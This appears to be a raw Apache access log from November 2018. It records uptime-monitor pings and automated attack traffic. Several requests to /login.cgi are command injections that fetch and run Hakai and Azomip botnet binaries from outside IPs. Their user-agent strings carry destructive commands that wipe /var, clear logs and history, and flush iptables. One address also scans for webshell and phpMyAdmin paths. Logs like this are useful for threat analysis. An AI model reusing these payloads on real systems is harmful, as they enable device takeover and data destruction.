206.189.108.215 - - [01/Nov/2018:19:16:59 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.24.5/hakai.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.24.5/hakai.mipsel -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.24.5/hakai.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:19:17:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:18:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
123.207.248.71 - - [01/Nov/2018:19:18:30 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://50.115.166.136/hakai.mips%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:19:19:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:20:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:21:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
113.21.126.13 - - [01/Nov/2018:19:21:29 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:19:22:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:23:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:24:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.189.17.250 - - [01/Nov/2018:19:24:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:19:25:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
197.32.180.99 - - [01/Nov/2018:19:25:30 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
40.81.74.67 - - [01/Nov/2018:19:25:53 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Nov/2018:19:26:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.187.223.177 - - [01/Nov/2018:19:26:43 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:19:27:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.188.116.50 - - [01/Nov/2018:19:27:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Nov/2018:19:28:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.149.185.33 - - [01/Nov/2018:19:28:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:19:29:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:30:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.186.207.15 - - [01/Nov/2018:19:30:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
206.189.111.70 - - [01/Nov/2018:19:31:16 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.24.5/hakai.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.24.5/hakai.mipsel -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.24.5/hakai.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:19:31:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.220.168.212 - - [01/Nov/2018:19:31:53 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:19:32:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:33:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:34:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:35:21 +0100] "PROPFIND / HTTP/1.1" 405 339 "-" "-"
132.232.51.137 - - [01/Nov/2018:19:35:22 +0100] "GET /webdav/ HTTP/1.1" 404 312 "-" "Mozilla/5.0"
212.91.246.72 - - [01/Nov/2018:19:35:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:35:46 +0100] "GET /db_pma.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:36:10 +0100] "GET /help-e.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:36:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
217.61.96.201 - - [01/Nov/2018:19:36:26 +0100] "GET /caiTianXiaLoginWeb/app/home HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.0.20) Gecko/20140123 Firefox/36.0"
132.232.51.137 - - [01/Nov/2018:19:36:39 +0100] "GET /license.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:36:50 +0100] "GET /log.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:36:51 +0100] "GET /hell.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:36:56 +0100] "GET /pmd_online.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:37:14 +0100] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:37:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:37:47 +0100] "GET /htdocs.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.237.45.250 - - [01/Nov/2018:19:37:56 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
132.232.51.137 - - [01/Nov/2018:19:37:58 +0100] "GET /desktop.ini.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:37:59 +0100] "GET /z.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:38:06 +0100] "GET /lala.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:38:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:38:23 +0100] "GET /lala-dpr.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.237.45.250 - - [01/Nov/2018:19:38:26 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
212.237.45.250 - - [01/Nov/2018:19:38:26 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
132.232.51.137 - - [01/Nov/2018:19:38:46 +0100] "GET /wpo.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:38:47 +0100] "GET /text.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:38:58 +0100] "GET /wp-config.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:39:11 +0100] "GET /muhstik.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:39:22 +0100] "GET /muhstik2.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:39:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:39:26 +0100] "GET /muhstiks.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:39:30 +0100] "GET /muhstik-dpr.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:39:34 +0100] "GET /lol.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
80.13.70.186 - - [01/Nov/2018:19:39:46 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
217.61.96.201 - - [01/Nov/2018:19:39:51 +0100] "GET /caiTianXiaLoginWeb/app/home HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.0.20) Gecko/20140123 Firefox/36.0"
132.232.51.137 - - [01/Nov/2018:19:39:55 +0100] "GET /uploader.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:40:14 +0100] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:40:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:40:31 +0100] "GET /cmx.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:40:46 +0100] "GET /cmv.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:40:58 +0100] "GET /cmdd.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:41:10 +0100] "GET /knal.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:41:15 +0100] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:41:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:41:42 +0100] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:41:50 +0100] "GET /appserv.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:41:51 +0100] "GET /scripts/setup.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:42:07 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:42:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:42:30 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:42:46 +0100] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:43:06 +0100] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:43:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:43:24 +0100] "GET /plugins/weathermap/editor.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:43:42 +0100] "GET /cacti/plugins/weathermap/editor.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
217.61.96.201 - - [01/Nov/2018:19:43:44 +0100] "GET /caiTianXiaLoginWeb/app/home HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.0.20) Gecko/20140123 Firefox/36.0"
132.232.51.137 - - [01/Nov/2018:19:43:56 +0100] "POST /wuwu11.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:44:20 +0100] "POST /xw.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:44:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.204.59.70 - - [01/Nov/2018:19:44:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
217.61.96.201 - - [01/Nov/2018:19:44:38 +0100] "GET /caiTianXiaLoginWeb/app/home HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.0.20) Gecko/20140123 Firefox/36.0"
156.202.207.73 - - [01/Nov/2018:19:44:54 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:19:45:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
217.61.96.201 - - [01/Nov/2018:19:45:43 +0100] "GET /caiTianXiaLoginWeb/app/home HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.0.20) Gecko/20140123 Firefox/36.0"
132.232.51.137 - - [01/Nov/2018:19:45:51 +0100] "POST /xw1.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:46:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:46:27 +0100] "POST /9678.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:46:51 +0100] "POST /wc.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:47:18 +0100] "POST /xx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:47:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.102.145.145 - - [01/Nov/2018:19:47:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
132.232.51.137 - - [01/Nov/2018:19:47:38 +0100] "POST /w.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
217.61.96.201 - - [01/Nov/2018:19:48:14 +0100] "GET /caiTianXiaLoginWeb/app/home HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.0.20) Gecko/20140123 Firefox/36.0"
217.61.96.201 - - [01/Nov/2018:19:48:18 +0100] "GET /caiTianXiaLoginWeb/app/home HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.0.20) Gecko/20140123 Firefox/36.0"
212.91.246.72 - - [01/Nov/2018:19:48:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:48:26 +0100] "POST /qaq.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:48:30 +0100] "POST /db.init.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:48:32 +0100] "POST /db_session.init.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:48:42 +0100] "POST /db__.init.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
133.209.120.57 - - [01/Nov/2018:19:48:43 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
132.232.51.137 - - [01/Nov/2018:19:48:50 +0100] "POST /wp-admins.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:49:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:49:27 +0100] "POST /m.php?pbid=open HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:50:00 +0100] "POST /db_dataml.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:50:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:51:06 +0100] "POST /db_desql.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:51:22 +0100] "POST /mx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:51:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:51:30 +0100] "POST /wshell.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
219.117.50.215 - - [01/Nov/2018:19:51:47 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
132.232.51.137 - - [01/Nov/2018:19:51:59 +0100] "POST /xshell.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:52:10 +0100] "POST /qq.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:52:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:52:34 +0100] "POST /conflg.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
206.189.108.215 - - [01/Nov/2018:19:53:05 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.24.5/hakai.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.24.5/hakai.mipsel -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.24.5/hakai.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
132.232.51.137 - - [01/Nov/2018:19:53:07 +0100] "POST /lindex.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
